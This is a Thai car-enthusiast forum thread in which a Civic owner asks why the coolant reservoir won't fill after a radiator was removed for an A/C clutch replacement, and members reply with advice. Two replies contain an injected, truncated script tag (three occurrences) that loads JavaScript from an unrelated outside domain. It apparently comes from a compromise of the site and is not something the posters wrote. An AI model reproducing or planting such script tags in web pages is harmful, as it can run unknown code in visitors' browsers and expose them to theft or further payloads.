ตอบ
madeawnoi

ชื่อเล่น: มะเดี่ยว

เข้าร่วม: 31 สิงหา 2009
ตอบ: 97

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 90
ให้คำขอบคุณ: 96

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 14 กุมภา 2012 16:48 - เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
ก่อนเดินทางไปเชียงใหม่ เอารถไปทำแอร์มา ช่างถอดหม้อน้ำ หม้อพัก เพื่อรื้อใส่คลัทช์คอมแอร์ ทำเสร็จ เติมน้ำที่หม้อพัก เติมเท่าไรก็ไม่เต็ม แถมไหลออกข้างล่าง พอดี ผมรีบเพราะต้องเดินทางเลย บอกช่างว่าจะเอามาทำอีกครั้ง แต่ตอนเดินทางไปเชียงใหม่ความร้อนก็ปกตินะครับ เกือบถึงครึ่งตลอดเวลา กลัวว่าจะมีปัยหาที่หม้อพัก เพราะก่อนที่จะถอดซ่อม เติมน้ำที่หม้อพัก เติมก็เต็ทปกติแล้วไม่รั่วลงที่ท้องรถเลย ผมเลยคิดว่ามันแปลก เลยอยากสอบถามพี่ครับว่ามันผิดปกติหรือป่าว เพราะช่างมันบอกจะมีจุกยางที่ปลายหม้อพักจุกนั้นอาจจะดันลงไม่สุดช่างบอกถ้าว่างเอามาถอดเช็คอีกที ขอบคุณล่วงหน้าครับ
ได้รับคำขอบคุณจาก: khem_hatyai  ค้าอะไหล่โคตรเก่า 
toptwo

ชื่อเล่น: ท็อป

เข้าร่วม: 25 มิถุนา 2011
ตอบ: 1000

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1279
ให้คำขอบคุณ: 1707

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 14 กุมภา 2012 22:27 - เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
หูยยยย กล้าขับไปได้ไงเนี่ยเติมน้ำหม้อน้ำไม่เต็ม ใจถึงจิงๆคับ
ได้รับคำขอบคุณจาก: khem_hatyai  madeawnoi 
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 14 กุมภา 2012 22:31 - เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
งั้นฟังเพลงนี้ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: khem_hatyai  madeawnoi 
LifeFate

เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 14 กุมภา 2012 23:04 - เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
เติมหม้อพัก ไม่ใช่หม้อน้ำ ใช่มั้ย ครับ

ว่าแต่ เปลี่ยนครัชคอมแอร์ต้องถอดหม้อน้ำด้วยหรอ ครับ ของผม ถอดแค่ปั๊มเพาเวอร์ ไดชาจ และ คอมแอร์

หรือ ผม งง <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: khem_hatyai 
ham_ter

ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
อังคาร, 14 กุมภา 2012 23:04 - Re: เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
madeawnoi พิมพ์ว่า:
ก่อนเดินทางไปเชียงใหม่ เอารถไปทำแอร์มา ช่างถอดหม้อน้ำ หม้อพัก เพื่อรื้อใส่คลัทช์คอมแอร์ ทำเสร็จ เติมน้ำที่หม้อพัก เติมเท่าไรก็ไม่เต็ม แถมไหลออกข้างล่าง พอดี ผมรีบเพราะต้องเดินทางเลย บอกช่างว่าจะเอามาทำอีกครั้ง แต่ตอนเดินทางไปเชียงใหม่ความร้อนก็ปกตินะครับ เกือบถึงครึ่งตลอดเวลา กลัวว่าจะมีปัยหาที่หม้อพัก เพราะก่อนที่จะถอดซ่อม เติมน้ำที่หม้อพัก เติมก็เต็ทปกติแล้วไม่รั่วลงที่ท้องรถเลย ผมเลยคิดว่ามันแปลก เลยอยากสอบถามพี่ครับว่ามันผิดปกติหรือป่าว เพราะช่างมันบอกจะมีจุกยางที่ปลายหม้อพักจุกนั้นอาจจะดันลงไม่สุดช่างบอกถ้าว่างเอามาถอดเช็คอีกที ขอบคุณล่วงหน้าครับ

ตอนนี้มาถึงเชียงใหม่หรือยัง ถ้ามาถึงแล้วมีเวลา จะดูให้
khem_hatyai

ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ปี: 2004
อังคาร, 14 กุมภา 2012 23:34 - Re: เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
ham_ter พิมพ์ว่า:
madeawnoi พิมพ์ว่า:

ตอนนี้มาถึงเชียงใหม่หรือยัง ถ้ามาถึงแล้วมีเวลา จะดูให้

ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
por

เข้าร่วม: 01 เมษา 2009
ตอบ: 760

Guru ES
Guru ES

ได้รับคำขอบคุณ: 977
ให้คำขอบคุณ: 913

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 15 กุมภา 2012 09:12 - เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
จริงๆแล้วไม่ต้องถอดอะไรเลยนะครับ..เปลื่ยนทางใต้ท้องรถ

ถึงเชียงใหม่แล้วเช็คดูดีๆนะ เรื่องความร้อน น่าเป็นห่วงอยู่
ได้รับคำขอบคุณจาก: madeawnoi 
slek

เข้าร่วม: 14 ธันวา 2009
ตอบ: 789

Guru ES
Guru ES

ได้รับคำขอบคุณ: 918
ให้คำขอบคุณ: 1124
พุธ, 15 กุมภา 2012 09:29 - เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
ระวังฝาสูบจะโก่งนะ ดูน้ำด้วยล่ะ
ได้รับคำขอบคุณจาก: madeawnoi 
madeawnoi

ชื่อเล่น: มะเดี่ยว

เข้าร่วม: 31 สิงหา 2009
ตอบ: 97

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 90
ให้คำขอบคุณ: 96

พุธ, 15 กุมภา 2012 09:35 - เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
น้ำที่หม้อพักน้ำครับที่เติมไม่เต็ม ผมเปิดดูในหม้อน้ำใหญ่ น้ำเต็มตลอด ตอนนี้กลับมาที่ขอนแก่นแล้ว ยังไงคงต้องเอาไปไปให้ร้านที่ทำแก้ไขอีกครั้งครับ
LifeFate

เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 15 กุมภา 2012 18:23 - เอารถไปเปลี่ยน คลัทช์ คอมแอร์มา ช่างถอดหม้อน้ำออก เสร็จ เติมน้ำที่หม้อพัก เท่าไรก้ไม่เต็ม
หม้อพัก มันไม่เต็มอยู่แล้วนี่ครับ หรือ ผม งง รอบ 2
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.